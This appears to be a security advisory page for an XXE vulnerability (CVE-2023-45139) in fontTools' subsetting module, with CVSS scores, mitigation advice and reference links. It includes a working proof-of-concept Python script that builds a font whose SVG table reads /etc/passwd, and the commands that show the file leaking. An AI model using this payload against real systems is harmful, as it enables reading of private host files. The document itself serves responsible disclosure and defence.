CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
AI Score
Confidence
Low
EPSS
Percentile
31.2%
As of fonttools>=4.28.2
the subsetting module has a XML External Entity Injection (XXE) vulnerability which allows an attacker to resolve arbitrary entities when a candidate font (OT-SVG fonts), which contains a SVG table, is parsed.
This allows attackers to include arbitrary files from the filesystem fontTools is running on or make web requests from the host system.
The vulnerability can be reproduced following the bellow steps on a unix based system.
/etc/passwd
for our POC file to include and modified an existing subset integration test to build the POC font - see bellow.
from string import ascii_letters
from fontTools.fontBuilder import FontBuilder
from fontTools.pens.ttGlyphPen import TTGlyphPen
from fontTools.ttLib import newTable
XXE_SVG = """\
<?xml version="1.0"?>
<!DOCTYPE svg [<!ENTITY test SYSTEM 'file:///etc/passwd'>]>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<g id="glyph1">
<text font-size="10" x="0" y="10">&test;</text>
</g>
</svg>
"""
def main():
# generate a random TTF font with an SVG table
glyph_order = [".notdef"] + list(ascii_letters)
pen = TTGlyphPen(glyphSet=None)
pen.moveTo((0, 0))
pen.lineTo((0, 500))
pen.lineTo((500, 500))
pen.lineTo((500, 0))
pen.closePath()
glyph = pen.glyph()
glyphs = {g: glyph for g in glyph_order}
fb = FontBuilder(unitsPerEm=1024, isTTF=True)
fb.setupGlyphOrder(glyph_order)
fb.setupCharacterMap({ord(c): c for c in ascii_letters})
fb.setupGlyf(glyphs)
fb.setupHorizontalMetrics({g: (500, 0) for g in glyph_order})
fb.setupHorizontalHeader()
fb.setupOS2()
fb.setupPost()
fb.setupNameTable({"familyName": "TestSVG", "styleName": "Regular"})
svg_table = newTable("SVG ")
svg_table.docList = [
(XXE_SVG, 1, 12)
]
fb.font["SVG "] = svg_table
fb.font.save('poc-payload.ttf')
if __name__ == '__main__':
main()
fonttools==4.42.1
and fonttools==4.28.2
- using the following flags (which just ensure the malicious glyph is mapped by the font and not discard in the subsetting process):pyftsubset poc-payload.ttf --output-file="poc-payload.subset.ttf" --unicodes="*" --ignore-missing-glyphs
ttx -t SVG poc-payload.subset.ttf && cat poc-payload.subset.ttx
Observed the included contents of the /etc/passwd
file.
Note the final severity is dependant on the environment fontTools is running in.
There may be other ways to mitigate the issue, but some suggestions:
resolve_entities=False
flag on parsing methodswww.openwall.com/lists/oss-security/2024/03/08/2
www.openwall.com/lists/oss-security/2024/03/09/1
github.com/advisories/GHSA-6673-4983-2vx5
github.com/fonttools/fonttools/commit/9f61271dc1ca82ed91f529b130fe5dc5c9bf1f4c
github.com/fonttools/fonttools/releases/tag/4.43.0
github.com/fonttools/fonttools/security/advisories/GHSA-6673-4983-2vx5
lists.fedoraproject.org/archives/list/[email protected]/message/VY63B4SGY4QOQGUXMECRGD6K3YT3GJ75
nvd.nist.gov/vuln/detail/CVE-2023-45139
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
AI Score
Confidence
Low
EPSS
Percentile
31.2%